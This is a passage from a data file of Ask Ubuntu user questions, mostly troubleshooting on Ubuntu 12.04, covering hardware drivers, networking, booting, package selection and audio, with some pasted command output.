/lib/ld-linux-armhf.so.3 ( 0x40086000 ) probably my problem is related to this . any ideas ? edit:3 according to @ jeremykerr 's request : ubuntu @ omap : ~/helloworld $ readelf -hl helloworldtest elf header : magic : 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 class : elf32 data : 2 's complement , little endian version : 1 ( current ) os/abi : unix - system v abi version : 0 type : exec ( executable file ) machine : arm version : 0x1 entry point address : 0x85ad start of program headers : 52 ( bytes into file ) start of section headers : 68360 ( bytes into file ) flags : 0x5000002 , has entry point , version5 eabi size of this header : 52 ( bytes ) size of program headers : 32 ( bytes ) number of program headers : 9 size of section headers : 40 ( bytes ) number of section headers : 38 section header string table index : 35 program headers : type offset virtaddr physaddr filesiz memsiz flg align exidx 0x00071c 0x0000871c 0x0000871c 0x00018 0x00018 r 0x4 phdr 0x000034 0x00008034 0x00008034 0x00120 0x00120 r e 0x4 interp 0x000154 0x00008154 0x00008154 0x00013 0x00013 r 0x1 [ requesting program interpreter : /lib/ld-linux.so.3 ] load 0x000000 0x00008000 0x00008000 0x00738 0x00738 r e 0x8000 load 0x000ef8 0x00010ef8 0x00010ef8 0x00144 0x001dc rw 0x8000 dynamic 0x000f08 0x00010f08 0x00010f08 0x000f8 0x000f8 rw 0x4 note 0x000168 0x00008168 0x00008168 0x00044 0x00044 r 0x4 gnu_stack 0x000000 0x00000000 0x00000000 0x00000 0x00000 rw 0x4 gnu_relro 0x000ef8 0x00010ef8 0x00010ef8 0x00108 0x00108 r 0x1 section to segment mapping : segment sections ... 00 .arm.exidx 01 02 .interp 03 .interp .note.abi-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .arm.exidx .eh_frame 04 .init_array .fini_array .jcr .dynamic .got .data .bss 05 .dynamic 06 .note.abi-tag .note.gnu.build-id 07 08 .init_array .fini_array .jcr .dynamic edit 4 : ldd and readelf -hl outputs of the cross-compiled executable on angstrom linux according to @ izx 's request : root @ beaglebone : ~ # ldd hello libgcc_s.so.1 = > /lib/libgcc_s.so.1 ( 0x401c3000 ) libc.so.6 = > /lib/libc.so.6 ( 0x401d4000 ) /lib/ld-linux.so.3 ( 0x40098000 ) root @ beaglebone : ~ # readelf -hl hello elf header : magic : 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 class : elf32 data : 2 's complement , little endian version : 1 ( current ) os/abi : unix - system v abi version : 0 type : exec ( executable file ) machine : arm version : 0x1 entry point address : 0x8380 start of program headers : 52 ( bytes into file ) start of section headers : 2696 ( bytes into file ) flags : 0x5000002 , has entry point , version5 eabi size of this header : 52 ( bytes ) size of program headers : 32 ( bytes ) number of program headers : 8 size of section headers : 40 ( bytes ) number of section headers : 38 section header string table index : 35 program headers : type offset virtaddr physaddr filesiz memsiz flg align exidx 0x0004e0 0x000084e0 0x000084e0 0x00050 0x00050 r 0x4 phdr 0x000034 0x00008034 0x00008034 0x00100 0x00100 r e 0x4 interp 0x000134 0x00008134 0x00008134 0x00013 0x00013 r 0x1 [ requesting program interpreter : /lib/ld-linux.so.3 ] load 0x000000 0x00008000 0x00008000 0x00534 0x00534 r e 0x8000 load 0x000534 0x00010534 0x00010534 0x00124 0x00128 rw 0x8000 dynamic 0x000540 0x00010540 0x00010540 0x000f0 0x000f0 rw 0x4 note 0x000148 0x00008148 0x00008148 0x00020 0x00020 r 0x4 gnu_stack 0x000000 0x00000000 0x00000000 0x00000 0x00000 rw 0x4 section to segment mapping : segment sections ... 00 .arm.exidx 01 02 .interp 03 .interp .note.abi-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .arm.extab .arm.exidx .eh_frame 04 .init_array .fini_array .jcr .dynamic .got .data .bss 05 .dynamic 06 .note.abi-tag 07
165955	how can i enable second core of my intel atom in my dell mini 910 ?	i did the following trick : http : //junkypc.com/enable-dual-core-processors-ubuntu/ but after that when i was trying to shutdown the system it seemed like shutting down forever so i had to use forced shutdown by holding power . the problem did n't dissappeared so i had to restore the lines `` currency=shell '' to `` none '' as it was . it 's shutting down properly . but i 'd be really glad if my first netbook with my first ubuntu would work faster . i have installed 32bit version due to low capacity of my ssd ( 16gb ) . can anyone help me ? thanks in advance and my regards for all linux community : )
165956	myriad of problems . 12.04 x86 on alienware m15x	i finally got around to reinstalling ubuntu 12.04 ( x86 ) on my computer and am having a whole slew of issues . here are the main issues i am having in order of severity . 1 ) random gtk ( gui ? ) crashes . basically the screen suddenly goes black and i am brought back to the lock screen and have to log in again . so far this seems to happen more when i am doing something and the computer is not sitting idle , but i wager if i left it idle long enough it would do the same thing . 2 ) can not resume from suspend . i am using a laptop and when i close the lid and open it again the screen turns on , but its all black . the only way for me to get back to doing anything is to restart the computer . 3 ) plymouth is using vga resolution . not the most severe of the issues , but something that still bugs me . i would like to get the random crashing solved first if possible . at the moment , this is pretty much a fresh install . i have installed some applications , i installed gnome-tweak-tool , but read somewhere that that was causing a problem for someone so i deleted it . my computer is an alienware m15x . it has an nvidia graphics card and i have a feeling that is causing some of these problems . instead of using the 'additional drivers ' tool in ubuntu , i did this how do i install the latest nvidia drivers via the additional drivers tool ? to install the latest nvidia driver .
165974	extra mouse button assigned to super-w short cut	i have assigned my middle click mouse button to the shortcut super-w in ubuntu 10.04 , now i need to change this binding , but i can not remember how i did it ... i 've not used btnx , xbindkeys , this are not installed ...
165976	can i remove the kde desktop from kubuntu and just use unity ?	hi my problem is i have kubuntu but really like unity , so would like to remove all kde packages to avoid a full re-install is this possable .
165980	scim input method not working	i 'm trying to type in my native language sinhala with scim..but nothing is working . ( i heard about something called ibus could help . ) i want to get the phonetic output in sinhala unicode , when i input some phrase in in english . is there a way to fix this ... ? appreciate any help , thanks ! my scim settings :
165983	overheating problem in samsung np550p7c laptop	i 've been struggling with some issues . first i will start off with a listing of my hardware . 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 0de9 ( rev ff ) 02:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) i have an issue with over heating , the laptop is a week old , and no fans are clogged . i 've tried various solutions , pwmconfig errors with : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed , jupiter seems to have no effects , and the samsung tools for laptops can not start the fans . typically the system will run at 45 to 56 c on each cpu . the fans simply never kick in . it will slowly hit 67 and then a seconds later lockup . i have disabled acpi . this resulted in the fans continuously running and the system locking up after 10 to 15 minutes . temp was 55 to 57 c. by locked up i mean no gui control , and not able to switch to console ( ctrl+alt+f1 - f6 ) . i 've been through many forum posts , and lots of google results but it seems no real solution . any help would be appreciated .
165985	ubuntu 12.4 and xp on seperate drives , dual boot , how ?	i have 2 different sata drives in my pc , a 160gb and a 200gb . i 'm unsure how to do this , and have a choice between them when i boot , any ideas ? is there a guide out there for this ? i installed xp on one , then ran ubuntu on it as 'install with ' it just boots into xp , i then reformatted , and put them both on separate drives , and it does the same again . i then tried win 7 , then ubuntu on the second ; again , no show , can someone please lend a hand ?
165987	sync problem on windows 7	i use ubuntuone on ubuntu 12.04 and windows 7 . everything synchronized fine for several months until a few weeks ago when ubuntuone on windows offered an update which i installed . now my files on windows 7 no longer sync even though it recognizes my username and password . it tries to sync and then quits . how do i fix this ?
165988	how to uninstall a program installed through wine	i installed picasa 3.9 with wine , but i did not like it , and now i want to delete it . i tried uninstalling picasa with the option from picasa help menu but it did n't work . how do i fully uninstall picasa from wine ?
165993	really slow copy speed	does writing data from ext4 to ntfs partition take a lot of time ? ? i get speeds upto only 70kb/s ( copy ) . ext4 - ext4 is pretty good and so is fat/fat32 - ext4 ( and vice-versa ) and fat/fat32 - ntfs ( and vice-versa ) . i suppose my hdd is a decent one since it scored 5.9 in the windows experience index .
165998	how do i copy a folder keeping owners and permissions intact ?	so i was going to back up my home folder by copying it to an external drive as follows : sudo cp -r /home/my_home /media/backup/my_home with the result that all folders on the external drives are now owned by root : root . how can i have cp keep the ownership and permissions from the original ?
165999	is it possible to get page description in window overlay mode in compiz ?	i am a fan of the window overlay mode of gnome 3 because i can see the icon of the application in the overlay mode and also the description of the window . it helps me choose faster . is it possible to get the same functionality in unity with compiz ? for a better explanation , here is a screenhot of gnome 3 with icon overlay
166003	how to set the package selection status to the current status ?	i have made a dpkg -- clear-selections command and found that all my packages are selected for removal . as the man pages is saying -- clear-selections : set the requested state of every non-essential package to deinstall . and i later knew , if i do a sudo apt-get dselect-upgrade all packages will be removed . i checked this question in ask ubuntu , and read the meaning of each various flags in dpkg -l command . there says , the first column shows `` desired package state '' or selection state and second column shows `` current state '' . since , i have no dependency problem now , i want to set my selection state as the desired state in dpkg database . how can i do this ? i have n't given the output of dpkg -l because of large output . the output is all ri columns . also when i did the command sudo apt-get dselect-upgrade , it gave me this message , ... ... ... after a long list of package names to be removed ... warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! apt ubuntu-keyring ( due to apt ) libapt-pkg4.12 ( due to apt ) libstdc++6 ( due to apt ) gnupg ( due to apt ) base-files bash 4 upgraded , 0 newly installed , 1764 to remove and 1 not upgraded . need to get 0 b/1,359 kb of archives . after this operation , 3,078 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] is there any way to reset the packages selection state to the current installed state ?
166008	how to search a network share ?	usually when i want to find a particular file on my local machine , i 'll open up a terminal and do find . -name `` *blah* '' from the directory which i want to search within . now i want to search from a network share , which i can access in nautilus by browsing to smb : //192.168.1.x/blah/ ... or by ssh : //192.168.1.x/blah/ .. but how can i open a terminal at this location and/or search for files there ?
166009	use ubuntu graphical desktop without monitor at boot	i have two computers : one running windows xp and one running ubuntu 12.04 . they are connected to my monitor via a vga switchbox . what i would like to do is be able to boot ubuntu without a monitor , but then be able to switch back to it , and still have a graphical desktop running . i have read about creating a headless ubuntu server , but the guides i have found all seem to involve disabling the graphical session altogether . how can i set this up ? edit : my ubuntu computer is a hp pavilion a1120n .
166014	how do i remove ubuntu on my computer ?	i want to remove my ubuntu on my computer . when i go to windows , i decide to format the disk but i got this : can someone teach me how to remove ubuntu on my computer using windows 7 thank you in advance ! i also got this : http : //s1186.photobucket.com/albums/z373/a26776500/ ? action=view & current=image1-2.png
166017	is it possible to add the ubuntu software center to sources.list ?	i would like to install some of the things on the ubuntu software center via command line ( apt-get ) . is this possible ? if so does anyone have the url handy to add to sources.list ? i ca n't seem to find this documented anywhere . looking for something like : deb http : //apps.ubuntu.com/ precise main > edit < finding the package name worked great for most free apps . is there a difference if it 's a commercial application ( even though it 's free ) ? i 'm specifically interested in : http : //apps.ubuntu.com/cat/applications/perforce-version-management the version info contains : perforce-version-management 2012.3+1-0ubuntu1 however , 'apt-cache search perforce ' or 'apt-cache search perforce-version-management ' do n't turn up this app .
166020	how can i rename items in places i do n't own , like / , and why should n't i ?	i get a permission denied message when trying to rename files and folders in places like / , /usr , and other people 's home directories . i 'm an administrator . how can i do this ? also , i 've heard that renaming files and folders like this could be dangerous . is that true ? should i not be doing this ?
166024	hd 3000 is not detected	i am using ubuntu 12.04 which is runing on an intel i7 based laptop with a gt540m nvidia graphic card . the problem is that the hd 3000 is not beeing used and lots of battery is being consumed , showing backup of 1.5 hour instead of 5 hours .
166026	wi-fi does n't work well , disconnect ( but connected ) every 10 minutes	i 'm running ubuntu 12.04 ( with all drivers updated ) . i 'm connected to my wireless router , everything works well , but after 10 minutes using firefox / chrome / skype / transmission the connection is lost only on ubuntu . other devices still have a connection to the internet . ubuntu is still connected to the router but no access to internet , even the router address is not accessible . i have to disconnect and connect the wi-fi to establish a new connection .
166028	moving deja dup backups from dropbox to ubuntu one	is there a way where i can instead transfer/upload all my previous deja dup backups from my dropbox to my ubuntu one and then from there , deja dup will just continue synching with it whenever it performs its scheduled backup operations ?
166029	can not choose windows installation	i 've never used linux before in any form , but was always intrigued , so after a while of deciding whether to risk it i installed ubuntu 12.04 during the installation i was asked `` what would you like to do ? '' install ubuntu as the only operating system , alongside another os , or something else . i chose something else as i wanted to format one of my old 100gb ide drives to serve as the partition to install ubuntu on . i formatted this drive with ext4 and made it the root directory for the installation , all ok . i also have on a 1tb sata drive two partitions ( splitting the disk in 2 ) one of these contains windows 7 and i did nothing to this drive ( and was careful to do so ) after the installation finished the computer restarted and gave me no option for choosing operating systems ? what have i done wrong how can this be fixed ? i would still like to be able to use win7 for gaming . any help on this matter would be greatly appreciated . : )
166032	graphical terminal misinterpreting input	i 've been having this weird problem with typing commands into gnome-terminal . if the command takes up multiple screen lines and i use any backspaces and the stars are in proper alignment the command becomes garbled but is echoed back fine . i typed and was echoed this : sudo dd if=debian-6.0.5-amd64-businesscard.iso of=/dev/sdb however that command returned this : sudddd : command not found curiously my history contained this : sudddd o if=debian-6.0.5-amd64-businesscard.iso of=/=/dev/sdb these garbled commands almost impersonate my intended command . really really annoying . also you may note how dangerous this becomes when using sudo . i do n't know if anyone has had similar issues and could n't find anything while googling .
166035	disk quota for a folder	i would like to limit the amount of data my deja dup backup will try to put on its corresponding dropbox folder , say limit it only to 500mb ? is it possible to set a disk quota on a file folder ?
166039	mplayer music library like banshee or wmp	hi i have been looking around for a plug in to make mplayer act as a music library but to no avail . dose any one know of one ? my aim is to find one media player that can do music and films ( must support x264 banshee dose not ) a bit like windows media player but on ubuntu .
166044	how to resize an ext4 encrypted home partition ?	which is the best way in order to resize an encrypted ( ecryptfs ) ext4 home partition ? pros nad cons of each method are greatly appreciated . $ fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes device boot start end blocks id system /dev/sda1 * 63 41945714 20972826 7 hpfs/ntfs/exfat /dev/sda2 207007744 211206554 2099405+ 82 linux swap / solaris /dev/sda3 42946560 82008063 19530752 83 linux /dev/sda4 82008064 207007743 62499840 83 linux
166046	usb mouse and keyboard not working after booting ( worked until today )	after a cold start it needs some time till my mouse and my keyboard get recognized . it worked until today . on this machine it runs a linux desktop 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux with the latest updates ( installed yesterday ) . this is the log of my dmesg : [ 30.608084 ] eth0 : no ipv6 routers present [ 31.452037 ] usb 1-6 : device descriptor read/64 , error -110 [ 31.668020 ] usb 1-6 : new high-speed usb device number 5 using ehci_hcd [ 46.780015 ] usb 1-6 : device descriptor read/64 , error -110 [ 61.996013 ] usb 1-6 : device descriptor read/64 , error -110 [ 62.212035 ] usb 1-6 : new high-speed usb device number 6 using ehci_hcd [ 72.620030 ] usb 1-6 : device not accepting address 6 , error -110 [ 72.732036 ] usb 1-6 : new high-speed usb device number 7 using ehci_hcd [ 83.140065 ] usb 1-6 : device not accepting address 7 , error -110 [ 83.140079 ] hub 1-0:1.0 : unable to enumerate usb device on port 6 [ 83.404036 ] usb 4-1 : new full-speed usb device number 2 using uhci_hcd [ 83.652566 ] input : logitech usb gaming mouse as /devices/pci0000:00/0000:00:1a.1/usb4/4-1/4-1:1.0/input/input10 [ 83.652697 ] generic-usb 0003:046d : c049.0001 : input , hidraw0 : usb hid v1.11 mouse [ logitech usb gaming mouse ] on usb-0000:00:1a.1-1/input0 [ 83.656357 ] generic-usb 0003:046d : c049.0002 : hiddev0 , hidraw1 : usb hid v1.11 device [ logitech usb gaming mouse ] on usb-0000:00:1a.1-1/input1 [ 83.656373 ] usbcore : registered new interface driver usbhid [ 83.656375 ] usbhid : usb hid core driver [ 83.832040 ] usb 4-2 : new low-speed usb device number 3 using uhci_hcd [ 84.022743 ] input : microsoft comfort curve keyboard 2000 as /devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.0/input/input11 [ 84.022847 ] generic-usb 0003:045e:00dd.0003 : input , hidraw2 : usb hid v1.11 keyboard [ microsoft comfort curve keyboard 2000 ] on usb-0000:00:1a.1-2/input0 [ 84.045583 ] input : microsoft comfort curve keyboard 2000 as /devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.1/input/input12 [ 84.045664 ] generic-usb 0003:045e:00dd.0004 : input , hidraw3 : usb hid v1.11 device [ microsoft comfort curve keyboard 2000 ] on usb-0000:00:1a.1-2/input1 [ 84.284066 ] usb 5-2 : new full-speed usb device number 2 using uhci_hcd [ 89.284028 ] uhci_hcd 0000:00:1a.2 : unlink after no-irq ? controller is probably using the wrong irq . notice : yeah , i found this question , but the bug-report is closed so maybe other people have the same problem . thanks in advance , best
166050	how to setup whole-disk encryption with dual boot on a macbook pro ( generation 9,2 with 12.04 )	i can install ubuntu 12.04 on the macbook when using the `` noapic '' kernel boot option , using the alternate amd64+mac image ( from http : //cdimage.ubuntu.com/releases/12.04/release/ ) . but after installation the screen turn sblack after trying to boot `` windows '' ( as named in the boot menu that shows up when holding option/alt during startup ) . i want to use whole-disk encryption and given that only one free partition is available , i have setup lvm to do so : - vg0 contains bootlv and cryptlv - in cryptlv i have setup encryption with another lvm volume group ( vg1 , which holds swaplv , rootlv and homelv ) i have not installed grub during installation ( because i was not sure about the partition ) and when trying to install it later on /dev/sda4 ( which contains the outer lvm ) it complained that it could not determine the file system , and -- force did not help either . the black screen / behavior looks similar to starting the installer without enabling the noapic option .
166056	precise printer interface- no options	i am trying to troubleshoot an hp printer in precise with gnome fallback . when i click on `` printers '' , i get a box that shows the printer it auto detected , which is correct , but it hsn no options to view/change the driver , add a printer , or anything else that was available in lucid .
166057	wired connection problem on 12.04 lts	i 've been surfing through google for an answer on this computer with windows , but i ca n't find any solid answer . i just installed ubuntu 12.04 on my asus eeepc netbook which had windows 7 starter . for some reason when i connect the internet cable ( that im using to connect this computer to the internet ) it does n't work . i 'm not sure if wireless is working since i do n't have a router yet . i 'm brand new to ubuntu so i 'm really at a loss here .
166058	in ubuntu 12.04 my mouse moves automatically , how can i stop it ?	as i said in the question 's topic , recently my laptop 's touchpad mouse moves the pointer automatically , i also have installed windows , but in there i do n't have this problem ! how can i fix this ? ps : as i am writing this question the mouse is moving : lol :
166063	ubuntu installation issue	i am installing ubuntu 12.04 lts . it is stuck at a point where it says `` downloading language packs ... '' time in it is randomly changing . it has been over 2 hours , since it is downloading . is there any way to skip this downloading with out terminating installation . further info : i am installing through dvd , if that matters at all , and have active internet connection that is working good ( checked it in my friend 's laptop , since it is shared , download speed about 50kbps )
166067	e : unable to locate package airodump-ng	so i have installed aircrack-ng and now trying to install airodump-ng but i am getting the following error message . e : unable to locate package airodump-ng question is , do i still need airdump if i have already installed aircrack ?
166068	port seems to be open , but connection refused	i am trying to open port 3000 on ubuntu 12.04 , cause i have a web server listening there . i 'm a bit out of my confort zone here , and spent many hours trying to solve the problem without success . port seems to be open in the firewall : $ > sudo ufw status status : active to action from -- -- -- -- -- -- ... 3000/tcp allow anywhere 3000/tcp allow anywhere ( v6 ) the server is listening alright on that port : $ > netstat -an | grep `` listen `` ... tcp 0 0 127.0.0.1:3000 0.0.0.0 : * listen ... and i can even wget alright the index page : $ > wget localhost:3000 connecting to localhost ( localhost ) |127.0.0.1|:3000 ... connected . http request sent , awaiting response ... 200 ok and the received file contains what i expect ( `` hello world '' : ) . however , when trying from another computer , or if i wget mydomain.com:3000 i get `` connection refused '' , and nmap tells me that the port is not open : $ > nmap -a -t4 mydomain.com host is up ( 0.00032s latency ) . ... not shown : 999 closed ports port state service version 22/tcp open ssh openssh 5.9p1 debian 5ubuntu1 ( protocol 2.0 ) ... service info : os : linux any idea what i should try next ? ? ? edit here 's what traceroute gives : $ > traceroute mydomain.com traceroute to mydomain.com ( 176.31.x.x ) , 30 hops max , 60 byte packets 1 mydomain.com ( 176.31.x.x ) 0.034 ms 0.013 ms 0.010 ms
166074	is hibernation supported with the intellibook on 12.04 ?	i installed ubuntu 12.04 on an intellibook ( intel® atom™ n450 processor , intel® nm10 express chipset , intel® gma 3150 ) , activated a swap partition and tried pm-hibernate . it seems to work but when i switch back on , the system will boot without restoring the old state . is there a way to activate hibernation on intellibook or is it not working on the given hardware ?
166079	why is n't aircrack identifying my wireless interface ?	i have installed aircrack and when trying to identify a wireless network interface ( after executing /sbin/iwconfig in the terminal ) i get the following . lo no wireless extensions . eth1 ieee 802.11 essid : '' netgear-3g '' mode : managed frequency:2.422 ghz access point : c0:3f:0e:9f : be : e0 bit rate=54 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off power management : off link quality=5/5 signal level=-20 dbm noise level=-94 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . i have wifi on my laptop and i see other wireless connections available to connect to . what am i doing wrong ?
166083	what is the `` /dev/xvda1 '' device ?	when i type mount on the root of my ubuntu system i get the output /dev/xvdal on / type ext4 ( rw , noatime ) i want to know what is the meaning of /dev/xvdal in this ?
166084	removed swap when editing fstab file-not sure	i wanted to remove the warning when starting ubuntu ( continue to wait , press s to skip or m for manual recovery ) . i did it ! but what i did not want to do was removing my swap partition . i am not sure if i have really removed it , i only removed the line in /etc/fstab file . this solved my problem with warning , but on the other side , i 've lost my swap partition . is there any way to recover the swap partition ( i think i did not remove it , only unmounted ? ) ? or at least getting the old one 's uuid ? i do not understand file systems in linux with home folders and so completely . thanks for the answers .
166092	wireless card causes ubuntu 12.04 to freeze on startup	i am currently running ubuntu 12.04 64-bit with a tp-link tl-wn851nd wireless card . every time i start up , anywhere between 0 and 60 seconds after the login screen appears , the computer freezes permanently and i am forced to power off . i managed to isolate the problem to the ath9k module , so i blacklisted ath9k and everything is running smoothly ... except now i ca n't use my wifi card . is there a way to fix ath9k ? or are there alternative drivers i can install ? thanks .
166093	will the data from my persistent live-usb automatically transfer when i install ?	i have a live usb of lubuntu 12.04 . i have been working with it for quite some time now and have installed quite a few packages in it . now , i want to convert this to an actual install . when i do so , will my settings and all the packages i have installed get transferred or will i only get the default factory version ?
166094	wireless keeps disconnecting after a while with a wnda3100v2	i have an wnda3100v2 wireless usb dongle , which i got working via the ndiswrapper . but randomly it disconnects . then to get it working i have to pullout the usb adapter and plug it back in . i search the log files , and found the following line immediately after a disconnect in /var/log/syslog : icmpv6 nd : ndisc_build_skb ( ) failed to allocate an skb , err=-11 . that line appears like every second in the log . i 'm currently not using encryption on my wireless network ( but using mac based security ) since it kept asking me for my network key .
166101	12.04 running slow when downloading files	i 've been using ubuntu for a while now , and just upgraded to the latest version about a couple months ago . i 've noticed , then and now , that 12.04 seems to run much slower on my computer and occasionally hangs whenever it 's downloading files , whether from dropbox , chromium , update manager , etc . i 've tried running the top command as well , but based on its output , which i have pasted below , it should n't be freezing . any ideas on how i can change this , or should i submit a bug ticket ? top - 12:30:48 up 22 min , 2 users , load average : 2.64 , 1.78 , 1.40 tasks : 203 total , 2 running , 199 sleeping , 0 stopped , 2 zombie cpu ( s ) : 5.3 % us , 4.0 % sy , 0.0 % ni , 59.8 % id , 30.8 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 3910260k total , 3779592k used , 130668k free , 897432k buffers swap : 262140k total , 636k used , 261504k free , 1369504k cached pid user pr ni virt res shr s % cpu % mem time+ command 1692 eyoung 20 0 1320m 104m 46m s 13 2.7 2:28.87 compiz 1051 root 20 0 366m 87m 67m s 8 2.3 0:43.72 xorg 2348 eyoung 20 0 508m 18m 11m s 3 0.5 0:01.35 gnome-terminal 2490 eyoung 20 0 892m 80m 20m s 2 2.1 0:15.91 chromium-browse 1719 eyoung 20 0 598m 115m 39m s 1 3.0 0:51.24 chromium-browse 2301 eyoung 20 0 967m 143m 20m s 1 3.8 0:15.49 chromium-browse 2332 eyoung 20 0 434m 37m 21m s 1 1.0 0:14.88 chromium-browse 1646 eyoung 20 0 27540 3260 624 s 1 0.1 0:01.95 dbus-daemon 241 root 20 0 0 0 0 r 1 0.0 0:03.80 kworker/2:1 1803 eyoung 20 0 405m 11m 7648 s 1 0.3 0:01.57 bamfdaemon 1982 eyoung 20 0 513m 19m 10m s 1 0.5 0:02.10 unity-panel-ser 2015 eyoung 20 0 860m 48m 14m s 1 1.3 0:07.89 chromium-browse 3350 eyoung 20 0 17440 1396 972 r 1 0.0 0:00.33 top 248 root 20 0 0 0 0 s 0 0.0 0:01.95 kworker/1:2 279 root 0 -20 0 0 0 s 0 0.0 0:10.80 loop0 284 root 20 0 0 0 0 d 0 0.0 0:00.55 kjournald 1984 eyoung 20 0 343m 5092 3472 s 0 0.1 0:01.34 hud-service 2024 eyoung 20 0 307m 11m 8476 s 0 0.3 0:00.75 gtk-window-deco 3004 eyoung 20 0 410m 66m 4768 s 0 1.8 0:05.77 ruby 3030 root 20 0 0 0 0 s 0 0.0 0:00.30 kworker/0:1 1 root 20 0 24444 2392 1348 s 0 0.1 0:00.97 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:00.05 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/0 8 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 10 root 20 0 0 0 0 s 0 0.0 0:00.06 ksoftirqd/1 12 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/1 13 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/2 15 root 20 0 0 0 0 s 0 0.0 0:00.02 ksoftirqd/2 16 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/2
166102	how do i configure juju for deployment on rackspace cloud ?	i 'd like to use juju to deploy to rackspace cloud , how can i do this ?
166105	how do i flush output appended to a file by a bash function/loop in real-time ?	my issue is that i have a function call it function1 which runs indefinitely . the function itself echo 's `` hello '' every 1 second . using the command : function1 > > temp.txt every 1 second if i am to view the file temp.txt i should see a new line with `` hello '' . however what 's happening is that the function does n't write to the file until its finished running . therefore if i am to kill the function nothing will be written . does anyone know of something i can do in this situation that will basically dynamically update temp.txt ? i have a python script set up the following way : while [ 1 > 0 ] : print `` hello '' time.sleep ( 1 ) therefore this will always be running . now i call this in a bash script python pythonscript.py > > temp.txt if i kill the process no data is logged .
166108	do i need to install extra drivers on an aspire 4750 6801 ?	i have an aspire 4750 6801 . i have installed ubuntu 12.04 and i want to install the hardware drivers but i got this message : `` no proprietary drivers are in use on this system '' . i would like to know if it is a problem or is there going to be problems in the future . i 'll really appreciate any help . mostly if you can help me to install at least the graph .
166117	how to keep internet connection while changing between eth0 and wlan0 ?	i have a laptop which i can put onto a docking station where it is connected to the internet via ethernet ( eth0 ) . otherwise , it is connected via wireless ( wlan0 ) . when i plug in the ethernet cable and disable the wireless , all programs loose internet access ( except the browser since it connects every single time ) . how can i let all applications have internet access independant of the physical device being used ? so that connections are kept alive through the interface change .
166122	solving permission denied problem	when i try to install gist program these words appear : permission denied so what does this mean and what can i do to solve this problem ? marwa @ marwa-vostro-1540 : ~ $ cd desktop/gist_1.0/ marwa @ marwa-vostro-1540 : ~/desktop/gist_1.0 $ ./gist bash : ./gist : permission denied
166125	how do i get video to unfreeze in ( x ) ubuntu 12.04 with skype ?	i implemented that last post - [ exec=bash -c 'ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype `` $ @ '' ' ] as specified in my /usr/share/applications/skype.desktop file , and as stated in the last comment : i also get my video working for a second and freezing until i move something near the camera , when it unfreezes . since my webcam works perfectly with cheese and video for linux control panel is this not a library problem or is data compression set automatically which should be unset ? i have xubuntu 12.04 on a 64 bit amd computer with a logitech quickcam 2500 series . the video works fine in xubuntu 11.10 and windows ( xp and 7 ) .
166126	unable to start jack ( can not allocate memory )	i want to use pulseaudio on top of jack , so i 've turned pulse off and now want to start jack using qjackctl . however , this results in the following error log : 22:14:15.933 patch panel disabled 22:14:15.940 reset statistics . 22:14:15.953 changed asla connection . 22:14:15.970 d-bus : service available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = file or directory not found can not connect to server socket jack server is not running or can not be started 22:14:15.980 updated visualization of asla connections 22:14:18.147 d-bus : unable to start jack server can not connect to server socket err = file or directory not found can not connect to server socket jack server is not running or can not be started fri jul 20 22:14:18 2012 : starting jack server ... fri jul 20 22:14:18 2012 : jack server starting in realtime mode with priority 10 fri jul 20 22:14:18 2012 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m fri jul 20 22:14:18 2012 : control device hw:0 fri jul 20 22:14:18 2012 : control device hw:0 fri jul 20 22:14:18 2012 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m fri jul 20 22:14:18 2012 : [ 1m [ 